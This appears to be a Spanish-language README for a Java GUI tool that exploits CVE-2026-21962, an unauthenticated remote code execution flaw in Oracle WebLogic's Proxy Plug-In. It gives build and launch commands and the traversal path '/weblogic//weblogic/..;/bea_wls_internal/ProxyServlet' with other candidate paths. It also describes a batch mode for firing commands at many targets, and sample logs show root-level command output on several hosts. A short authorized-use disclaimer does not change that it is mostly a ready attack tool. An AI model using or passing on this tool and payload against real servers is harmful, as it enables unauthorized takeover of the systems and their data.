
Herramienta GUI en Java para explotar CVE-2026-21962, una RCE no autenticada en Oracle WebLogic Proxy Plug-In, que permite la ejecución de comandos en múltiples objetivos a través de HTTP.
Versión GUI en Java de la herramienta de explotación de la vulnerabilidad RCE (Ejecución Remota de Código) del Proxy Plug-In de Oracle WebLogic Server.
java-version/
├── pom.xml # Archivo de configuración del proyecto Maven
├── README.md # Documentación del proyecto
├── run.bat # Script de inicio para Windows
└── src/
└── main/
└── java/
└── com/
└── ashwesker/
└── cve202621962/
├── Main.java # Punto de entrada del programa
├── core/
│ └── Exploit.java # Lógica principal de explotación
├── gui/
│ └── MainWindow.java # Ventana principal de la GUI
└── util/
└── HttpClient.java # Herramienta de solicitudes HTTP
La ventana del programa incluye las siguientes áreas:
Área de parámetros de entrada (superior)
Área de botones (central)
Área de registro de ejecución (inferior izquierda)
Área de salida de comandos (inferior derecha)
cd java-version
mvn clean compile
mvn clean package
El archivo JAR empaquetado se encuentra en: target/cve-2026-21962-1.0.0.jar
Haga doble clic en el archivo run.bat para iniciar el programa
cd java-version
mvn exec:java -Dexec.mainClass="com.ashwesker.cve202621962.Main"
java -jar target/cve-2026-21962-1.0.0.jar
cd java-version
mvn clean compile
java -cp "target/classes;[ruta del jar de dependencias]" com.ashwesker.cve202621962.Main
URL objetivo:
http://192.168.1.100:7001
Comando a ejecutar:
whoami
URL objetivo:
http://192.168.1.100:7001
http://192.168.1.101:7001
http://192.168.1.102:7001
https://weblogic.example.com:4443
Comando a ejecutar:
id
Ejemplo de salida:
[*] Iniciando prueba de vulnerabilidad...
[*] URL objetivo: http://192.168.1.100:7001
[*] Comando a ejecutar: id
[*] Ruta de prueba: http://192.168.1.100:7001/weblogic//weblogic/..;/bea_wls_internal/ProxyServlet
[+] ¡Éxito! Código de estado: 200
[+] ¡Comando ejecutado con éxito!
uid=0(root) gid=0(root) groups=0(root)
------------------------------------------------------------
================================================================================
[*] Iniciando prueba de vulnerabilidad...
[*] URL objetivo: http://192.168.1.101:7001
[*] Comando a ejecutar: id
[*] Ruta de prueba: http://192.168.1.101:7001/weblogic//weblogic/..;/bea_wls_internal/ProxyServlet
[+] ¡Éxito! Código de estado: 200
[+] ¡Comando ejecutado con éxito!
uid=0(root) gid=0(root) groups=0(root)
------------------------------------------------------------
Después de iniciar el programa, ingrese la dirección del servidor objetivo en el campo de texto "URL objetivo"
http://target:7001 o https://oracle-server:4443Ingrese el comando a ejecutar en el campo "Comando a ejecutar"
whoami, id, powershell -c ..., etc.Haga clic en el botón "Ejecutar explotación" para iniciar la prueba
Consulte el "Registro de ejecución" inferior para conocer el proceso de prueba
Consulte la "Salida de comandos" inferior para obtener los resultados de la ejecución
Ingrese múltiples direcciones objetivo en el campo de texto "URL objetivo", una por línea
http://target1:7001
http://target2:7001
https://target3:4443
Ingrese el comando a ejecutar en el campo "Comando a ejecutar"
Haga clic en el botón "Ejecutar explotación" para iniciar la prueba por lotes
El programa probará cada objetivo secuencialmente, y las salidas de diferentes objetivos se separan con ================ (80 signos igual)
Consulte el "Registro de ejecución" inferior para conocer el proceso de prueba de cada objetivo
Consulte la "Salida de comandos" inferior para obtener los resultados de ejecución de todos los objetivos
El programa probará automáticamente las siguientes rutas:
/weblogic//wl_proxy//bea_wls_internal//_proxy//proxy/⚠️ Advertencia: Esta herramienta es solo para pruebas de seguridad autorizadas. El uso no autorizado de esta herramienta para atacar sistemas es ilegal.
Main.java
Exploit.java
MainWindow.java
HttpClient.java
Este proyecto es solo para fines educativos y de investigación de seguridad.